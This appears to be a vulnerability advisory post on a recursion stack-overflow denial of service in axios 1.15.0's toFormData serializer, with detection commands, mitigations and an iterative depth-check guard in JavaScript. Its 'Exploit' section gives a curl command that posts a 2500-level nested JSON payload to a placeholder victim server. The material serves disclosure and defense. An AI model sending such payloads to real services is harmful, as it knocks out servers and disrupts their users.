The vulnerability resides in `toFormData.js` (axios library), where an inner `build(value, path)` function recursively traverses user-supplied objects with no depth limit. When a client provides a deeply nested object (e.g., 2500 levels), each nesting level triggers a new `build()` call. The recursion continues until V8's stack capacity is exhausted, throwing `RangeError: Maximum call stack size exceeded`. No depth check, try/catch, or iterative fallback exists; the only safeguard is a circular-reference detector.

This recursive serializer is invoked when axios processes `data` (for `FormData` bodies) or `params` (via `AxiosURLSearchParams` and `buildURL`). Any server-side endpoint that forwards a client-supplied JSON object into `axios({ data, params })` therefore becomes a DoS vector. The error propagates synchronously out of the request handler, crashing the individual request; in worker threads or startup code, it kills the entire Node.js process.

A proof-of-concept confirms the crash at depth 2500 on Node.js 20 with axios 1.15.0 (latest as of 2026-04-10). Unauthenticated remote attackers can repeatedly send crafted payloads to exhaust the call stack, leading to service disruption.
Platform: axios Node.js
Version: 1.15.0
Vulnerability: Recursive stack overflow
Severity: Medium
Date: 2026-04-10
Prediction: Patch within 30 days
What Undercode Say:
Check if your axios version is affected:

```bash
npm list axios
```

Test for the deep recursion vulnerability (Node.js). Note that `deep` must be declared with `let`, not `const`, because it is reassigned on every loop iteration:

```bash
node -e "const axios=require('axios'); let deep={leaf:1}; for(let i=0;i<2500;i++) deep={a:deep}; axios.post('http://localhost:3000/forward', deep).catch(e=>console.log(e.message));"
```

Monitor for stack overflow errors in production logs:

```bash
grep -i "Maximum call stack size exceeded" /var/log/app/node.log
```
Exploit:
An attacker sends a POST request with a JSON payload nested 2500+ levels deep to any endpoint that echoes or proxies user input via axios. Example using curl (the nested document is built iteratively with `reduce`, since a recursive Python `def` would exceed Python's default recursion limit of 1000 at depth 2500):

```bash
curl -X POST http://victim.com/proxy \
  -H "Content-Type: application/json" \
  -d "$(python3 -c "import json; from functools import reduce; print(json.dumps(reduce(lambda d, _: {'a': d}, range(2500), {'leaf': 1})))")"
```

The server throws `RangeError`, and the request handler dies; repeated requests cause sustained DoS.
Protection from this CVE
- Upgrade axios when the official patch is released (expected to implement a depth limit of ~100).
- Apply a temporary workaround: validate and limit the nesting depth of incoming JSON before passing it to axios (e.g., using `json-schema` with `maxItems`, or a custom recursive depth check).
- Replace the synchronous recursive `toFormData` with an iterative, stack-based serialization in a local fork.
- Deploy a reverse proxy with request size and nesting depth limits (e.g., Nginx `client_max_body_size` plus a custom Lua depth filter).
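As an added defensive example (not code from axios or from the original post), the following implements the depth-limiting workaround from the second bullet using the stack-based approach of the third: it walks the payload with an explicit stack, so the same 2500-level input that overflows the recursive `build()` cannot overflow the check, and it stops as soon as the configured limit is passed. `MAX_DEPTH`, `nestingDepth`, `assertSafeDepth`, `buildNested` and the Express-style handler in the trailing comment are assumptions, not names from the project.

```javascript
// Added example, not axios code: an iterative nesting-depth check that runs on
// client-supplied JSON before it is handed to axios({ data, params }). It uses
// an explicit stack instead of recursion, so the same 2500-level payload that
// overflows the recursive build() cannot overflow the check itself.
const MAX_DEPTH = 100; // assumed limit, mirroring the ~100 depth cap mentioned above

// Returns how many object/array levels `value` nests (a scalar is 0, {} is 1),
// or Infinity as soon as the walk passes `limit`, so hostile input and even
// circular references are abandoned early instead of being traversed fully.
function nestingDepth(value, limit = MAX_DEPTH) {
  const stack = [{ value, depth: 1 }];
  let deepest = 0;
  while (stack.length > 0) {
    const { value: cur, depth } = stack.pop();
    if (cur === null || typeof cur !== 'object') continue; // leaf: adds no level
    if (depth > limit) return Infinity;
    if (depth > deepest) deepest = depth;
    for (const child of Object.values(cur)) {
      if (child !== null && typeof child === 'object') {
        stack.push({ value: child, depth: depth + 1 });
      }
    }
  }
  return deepest;
}

// Guard to call before axios: throws on over-deep input, returns the payload otherwise.
function assertSafeDepth(payload, limit = MAX_DEPTH) {
  if (nestingDepth(payload, limit) > limit) {
    throw new Error(`payload nesting exceeds ${limit} levels`);
  }
  return payload;
}

// Constructed sample input: wraps { leaf: 1 } in `levels` extra object layers.
function buildNested(levels) {
  let obj = { leaf: 1 };
  for (let i = 0; i < levels; i++) obj = { a: obj };
  return obj;
}

// Hypothetical Express-style forwarding handler showing where the guard sits:
//   app.post('/forward', (req, res, next) => {
//     try { assertSafeDepth(req.body); } catch (e) { return res.status(400).send(e.message); }
//     axios.post(UPSTREAM_URL, req.body).then(r => res.json(r.data)).catch(next);
//   });
console.log(nestingDepth(buildNested(10)), nestingDepth(buildNested(2500))); // 11 Infinity
```

Because the walk gives up once `depth` exceeds the limit, a self-referencing object also yields `Infinity` rather than looping forever, so the guard does not need its own cycle detector.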
Impact
A remote unauthenticated attacker can crash server-side request handlers that forward client-controlled objects to axios (`data` or `params`). In clustered environments (e.g., the Node.js `cluster` module), each crashing worker forces a restart, leading to degraded performance or a full outage. There is no data loss or privilege escalation, but the availability impact is high for any API gateway or microservice using axios as its HTTP client.
Sources:
Reported By: github.com